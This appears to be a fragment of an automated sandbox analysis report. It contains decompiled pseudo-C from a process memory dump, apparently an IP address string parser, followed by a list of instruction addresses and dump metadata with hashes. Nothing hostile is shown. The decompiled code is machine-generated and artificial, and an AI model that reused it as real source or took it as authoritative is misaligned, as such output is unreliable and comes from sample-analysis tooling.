								_t122 = E0254EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0254685D(_t167, 4) == 0) {
								if(E0254685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0254685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0254685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02528980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0251DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0254EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0254EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                0x0254fcd1
                                                0x0254fcd6
                                                0x0254fcd9
                                                0x0254fcdc
                                                0x0254fcdf
                                                0x0254fce2
                                                0x0254fce5
                                                0x0254fce8
                                                0x0254fceb
                                                0x0254fced
                                                0x0254fced
                                                0x0254fcf3
                                                0x00000000
                                                0x00000000
                                                0x0254fcfc
                                                0x0254fcfe
                                                0x0254fdc1
                                                0x0257ecbd
                                                0x00000000
                                                0x0257eccc
                                                0x0257eccc
                                                0x0257ecd2
                                                0x00000000
                                                0x00000000
                                                0x0257ecdf
                                                0x0257ece0
                                                0x0257ece4
                                                0x0257eceb
                                                0x0257ecee
                                                0x0257eca8
                                                0x0257eca8
                                                0x0257ecaa
                                                0x0254fd76
                                                0x0254fd79
                                                0x0254fdb4
                                                0x0254fdb5
                                                0x0254fdb6
                                                0x00000000
                                                0x0254fdb6
                                                0x0254fd7e
                                                0x0257ecfc
                                                0x0254fe2f
                                                0x00000000
                                                0x0254fe2f
                                                0x0257ed08
                                                0x0257ed0f
                                                0x0257ed17
                                                0x0257ed1b
                                                0x00000000
                                                0x0257ed1b
                                                0x0254fd88
                                                0x00000000
                                                0x00000000
                                                0x0254fd94
                                                0x0254fd99
                                                0x0254fda1
                                                0x00000000
                                                0x00000000
                                                0x0254fdb0
                                                0x00000000
                                                0x0254fdb0
                                                0x0257ecbd
                                                0x0254fdc7
                                                0x0254fdcb
                                                0x00000000
                                                0x0254fdd7
                                                0x0254fde3
                                                0x0254fe06
                                                0x02561fe7
                                                0x00000000
                                                0x00000000
                                                0x02561fef
                                                0x02561ff0
                                                0x02561ff4
                                                0x02561ff7
                                                0x02561ffa
                                                0x02561ffd
                                                0x02562000
                                                0x00000000
                                                0x00000000
                                                0x0257ecf1
                                                0x00000000
                                                0x0257ecf1
                                                0x00000000
                                                0x0254fe06
                                                0x0254fde8
                                                0x0254fdec
                                                0x0254fdef
                                                0x0254fdf2
                                                0x00000000
                                                0x0254fdf2
                                                0x0254fdcb
                                                0x0254fd04
                                                0x0254fd05
                                                0x0257ec67
                                                0x00000000
                                                0x00000000
                                                0x0257ec6f
                                                0x00000000
                                                0x0257ec6f
                                                0x0254fd13
                                                0x0254fd3c
                                                0x0254fd40
                                                0x0257ec75
                                                0x0257ec7a
                                                0x00000000
                                                0x0257ec8a
                                                0x0257ec8a
                                                0x0257ec90
                                                0x0257ecb2
                                                0x0254fd73
                                                0x0254fd73
                                                0x00000000
                                                0x0254fd73
                                                0x0257ec95
                                                0x00000000
                                                0x00000000
                                                0x0257eca1
                                                0x0257eca4
                                                0x0257eca5
                                                0x00000000
                                                0x0257eca5
                                                0x0257ec7a
                                                0x0254fd4a
                                                0x00000000
                                                0x0254fd6e
                                                0x0254fd6e
                                                0x0254fd71
                                                0x00000000
                                                0x0254fd71
                                                0x0254fd4a
                                                0x0254fd21
                                                0x0255a3a1
                                                0x00000000
                                                0x0255a3a1
                                                0x0254fd36
                                                0x0256200b
                                                0x02562012
                                                0x00000000
                                                0x00000000
                                                0x02562018
                                                0x00000000
                                                0x02562018
                                                0x00000000
                                                0x0254fd36
                                                0x0254fe0f
                                                0x0254fe16
                                                0x0255a3ad
                                                0x00000000
                                                0x00000000
                                                0x0255a3b3
                                                0x0255a3b3
                                                0x0254fe1f
                                                0x0257ed25
                                                0x0257ed86
                                                0x00000000
                                                0x00000000
                                                0x0257ed91
                                                0x0257ed95
                                                0x0257ed95
                                                0x0257ed9a
                                                0x0257edad
                                                0x0257edb3
                                                0x0257edba
                                                0x0257edc4
                                                0x0257edc9
                                                0x00000000
                                                0x0257edcc
                                                0x0257ed2a
                                                0x0257ed55
                                                0x00000000
                                                0x00000000
                                                0x0257ed61
                                                0x0257ed66
                                                0x0257ed6e
                                                0x00000000
                                                0x00000000
                                                0x0257ed7d
                                                0x00000000
                                                0x0257ed7d
                                                0x0257ed30
                                                0x00000000
                                                0x00000000
                                                0x0257ed3c
                                                0x0257ed43
                                                0x0257ed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: 4a259fc3b6d0d9fc7a15e12d1f3c35a3bf2cbeebf3b713414195a6942ea409ea
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: 3F918B31D0021AEFDF25CF99C8457AEFBB8FB8531DF20846AD405A6691EB304A51CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%